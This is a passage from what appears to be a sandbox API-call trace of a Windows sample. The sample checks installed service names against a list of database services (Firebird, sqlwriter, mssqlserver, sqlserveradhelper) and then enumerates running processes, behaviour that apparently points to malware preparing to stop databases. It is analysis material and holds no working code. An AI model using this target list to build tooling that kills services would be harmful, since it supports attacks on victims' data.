(lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0174.617] lstrlenW (lpString="CryptSvc") returned 8 [0174.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0174.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0174.617] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0174.617] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0174.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0174.617] lstrlenW (lpString="DcomLaunch") returned 10 [0174.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0174.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0174.618] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0174.618] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0174.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0174.618] lstrlenW (lpString="Dhcp") returned 4 [0174.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0174.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0174.618] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0174.618] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0174.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0174.618] lstrlenW (lpString="Dnscache") returned 8 [0174.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0174.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0174.618] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0174.618] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0174.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0174.618] lstrlenW (lpString="DoSvc") returned 5 [0174.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0174.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0174.618] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0174.618] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0174.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0174.618] lstrlenW (lpString="DPS") returned 3 [0174.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0174.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0174.618] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0174.618] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0174.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0174.618] lstrlenW (lpString="DusmSvc") returned 7 [0174.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0174.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0174.618] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0174.618] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0174.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0174.619] lstrlenW (lpString="EventLog") returned 8 [0174.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0174.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0174.619] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0174.619] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0174.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0174.619] lstrlenW (lpString="EventSystem") returned 11 [0174.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0174.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0174.619] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0174.619] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0174.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0174.619] lstrlenW (lpString="FontCache") returned 9 [0174.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0174.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0174.619] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0174.619] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0174.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0174.619] lstrlenW (lpString="gpsvc") returned 5 [0174.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0174.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0174.619] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0174.619] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0174.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0174.619] lstrlenW (lpString="iphlpsvc") returned 8 [0174.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0174.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0174.619] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0174.619] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0174.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0174.619] lstrlenW (lpString="KeyIso") returned 6 [0174.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0174.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0174.620] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0174.620] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0174.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0174.620] lstrlenW (lpString="LanmanServer") returned 12 [0174.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0174.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0174.620] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0174.620] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0174.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0174.620] lstrlenW (lpString="LanmanWorkstation") returned 17 [0174.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0174.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0174.620] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0174.620] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0174.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0174.620] lstrlenW (lpString="lfsvc") returned 5 [0174.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0174.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0174.620] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0174.620] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0174.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0174.620] lstrlenW (lpString="lmhosts") returned 7 [0174.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0174.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0174.620] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0174.620] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0174.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0174.620] lstrlenW (lpString="LSM") returned 3 [0174.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0174.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0174.620] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0174.621] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0174.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0174.621] lstrlenW (lpString="MpsSvc") returned 6 [0174.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0174.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0174.621] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0174.621] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0174.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0174.621] lstrlenW (lpString="NcbService") returned 10 [0174.621] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0174.621] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0174.621] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0174.621] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0174.621] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0175.161] lstrlenW (lpString="netprofm") returned 8 [0175.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0175.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0175.211] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0175.211] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0175.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0175.211] lstrlenW (lpString="NlaSvc") returned 6 [0175.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0175.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0175.211] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0175.211] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0175.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0175.211] lstrlenW (lpString="nsi") returned 3 [0175.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0175.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0175.211] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0175.212] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0175.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0175.212] lstrlenW (lpString="PcaSvc") returned 6 [0175.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0175.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0175.212] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0175.212] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0175.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0175.212] lstrlenW (lpString="PlugPlay") returned 8 [0175.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0175.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0175.212] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0175.212] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0175.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0175.212] lstrlenW (lpString="Power") returned 5 [0175.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0175.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0175.212] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0175.212] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0175.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0175.212] lstrlenW (lpString="ProfSvc") returned 7 [0175.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0175.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0175.212] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0175.212] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0175.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0175.212] lstrlenW (lpString="RpcEptMapper") returned 12 [0175.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0175.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0175.212] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0175.212] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0175.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0175.212] lstrlenW (lpString="RpcSs") returned 5 [0175.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0175.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0175.213] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0175.213] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0175.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0175.213] lstrlenW (lpString="SamSs") returned 5 [0175.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0175.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0175.213] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0175.213] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0175.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0175.213] lstrlenW (lpString="Schedule") returned 8 [0175.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0175.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0175.213] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0175.213] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0175.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0175.213] lstrlenW (lpString="SecurityHealthService") returned 21 [0175.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0175.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0175.213] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0175.213] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0175.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0175.213] lstrlenW (lpString="SENS") returned 4 [0175.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0175.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0175.213] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0175.213] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0175.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0175.213] lstrlenW (lpString="ShellHWDetection") returned 16 [0175.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0175.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0175.213] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0175.213] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0175.213] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0175.213] lstrlenW (lpString="Spooler") returned 7 [0175.213] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0175.213] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0175.214] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0175.214] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0175.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0175.214] lstrlenW (lpString="sppsvc") returned 6 [0175.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0175.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0175.214] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0175.214] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0175.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0175.214] lstrlenW (lpString="SSDPSRV") returned 7 [0175.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0175.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0175.214] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0175.214] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0175.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0175.214] lstrlenW (lpString="StateRepository") returned 15 [0175.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0175.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0175.214] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0175.214] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0175.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0175.214] lstrlenW (lpString="SysMain") returned 7 [0175.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0175.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0175.214] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0175.214] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0175.214] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0175.214] lstrlenW (lpString="SystemEventsBroker") returned 18 [0175.214] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0175.214] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0175.214] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0175.214] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0175.215] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x770a50 | out: hHeap=0x710000) returned 1 [0175.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x384 [0175.229] Process32FirstW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.230] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0175.230] lstrlenW (lpString="System") returned 6 [0175.230] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0175.231] lstrlenW (lpString="smss.exe") returned 8 [0175.231] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.231] lstrlenW (lpString="csrss.exe") returned 9 [0175.232] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0175.232] lstrlenW (lpString="wininit.exe") returned 11 [0175.232] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.233] lstrlenW (lpString="csrss.exe") returned 9 [0175.233] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0175.233] lstrlenW (lpString="winlogon.exe") returned 12 [0175.233] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0175.234] lstrlenW (lpString="services.exe") returned 12 [0175.234] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0175.235] lstrlenW (lpString="lsass.exe") returned 9 [0175.235] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.235] lstrlenW (lpString="svchost.exe") returned 11 [0175.235] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0175.236] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0175.236] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0175.236] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0175.236] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.237] lstrlenW (lpString="svchost.exe") returned 11 [0175.237] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0175.237] lstrlenW (lpString="dwm.exe") returned 7 [0175.237] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.238] lstrlenW (lpString="svchost.exe") returned 11 [0175.238] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.238] lstrlenW (lpString="svchost.exe") returned 11 [0175.238] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.239] lstrlenW (lpString="svchost.exe") returned 11 [0175.239] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.240] lstrlenW (lpString="svchost.exe") returned 11 [0175.240] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.240] lstrlenW (lpString="svchost.exe") returned 11 [0175.240] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.241] lstrlenW (lpString="svchost.exe") returned 11 [0175.241] Process32NextW (in: hSnapshot=0x384, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, 